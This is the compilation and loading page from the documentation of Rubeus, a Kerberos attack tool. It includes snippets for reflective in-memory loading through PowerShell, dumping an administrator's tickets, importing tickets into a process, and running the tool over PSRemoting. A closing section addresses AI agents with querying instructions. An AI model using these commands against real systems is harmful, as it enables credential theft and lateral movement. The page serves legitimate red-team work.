# Compilation Instructions ## Compile Instructions We are not planning on releasing binaries for Rubeus, so you will have to compile yourself :) Rubeus has been built against .NET 3.5 and is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Simply open up the project .sln, choose "Release", and build. ### Targeting other .NET versions Rubeus' default build configuration is for .NET 3.5, which will fail on systems without that version installed. To target Rubeus for .NET 4 or 4.5, open the .sln solution, go to **Project** -> **Rubeus Properties** and change the "Target framework" to another version. ### Sidenote: Building Rubeus as a Library To build Rubeus as a library, under **Project** -> **Rubeus Properties** -> change **Output type** to **Class Library**. Compile, and add the Rubeus.dll as a reference to whatever project you want. Rubeus functionality can then be invoked as in a number of ways: ``` // pass the Main method the arguments you want Rubeus.Program.Main("dump /luid:3050142".Split()); // or invoke specific functionality manually Rubeus.LSA.ListKerberosTicketDataAllUsers(new Rubeus.Interop.LUID()); ``` You can then use [ILMerge](https://www.microsoft.com/en-us/download/details.aspx?displaylang=en\&id=17630) to merge the Rubeus.dll into your resulting project assembly for a single, self-contained file. ### Sidenote: Running Rubeus Through PowerShell If you want to run Rubeus in-memory through a PowerShell wrapper, first compile the Rubeus and base64-encode the resulting assembly: ``` [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Rubeus.exe")) | Out-File -Encoding ASCII C:\Temp\rubeus.txt ``` Rubeus can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Rubeus assembly string): ``` $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa...")) ``` The Main() method and any arguments can then be invoked as follows: ``` [Rubeus.Program]::Main("dump /user:administrator".Split()) ``` Or individual functions can be invoked: ``` $TicketBytes = [convert]::FromBase64String('BASE64_KERB_TICKET') # start mmc.exe as netonly, not-hidden $LogonID = [Rubeus.Helpers]::CreateProcessNetOnly("mmc.exe", $true) # apply the ticket to mmc's logon session [Rubeus.LSA]::ImportTicket($TicketBytes, $LogonID) ``` #### Sidenote Sidenote: Running Rubeus Over PSRemoting Due to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Rubeus has a function to help with that. If you follow the instructions in [Sidenote: Running Rubeus Through PowerShell](broken://pages/-MYMTQUCNlnw0EMy9tNq#sidenote-running-rubeus-through-powershell) to create a Rubeus.ps1, append something like the following to the script: ``` [Rubeus.Program]::MainString("triage") ``` You should then be able to run Rubeus over PSRemoting with something like the following: ``` $s = New-PSSession dc.theshire.local Invoke-Command -Session $s -FilePath C:\Temp\Rubeus.ps1 ``` Alternatively, Rubeus' `/consoleoutfile:C:\FILE.txt` argument will redirect all output streams to the specified file. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://specterops.gitbook.io/ghostpack/rubeus/introduction/compilation-instructions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.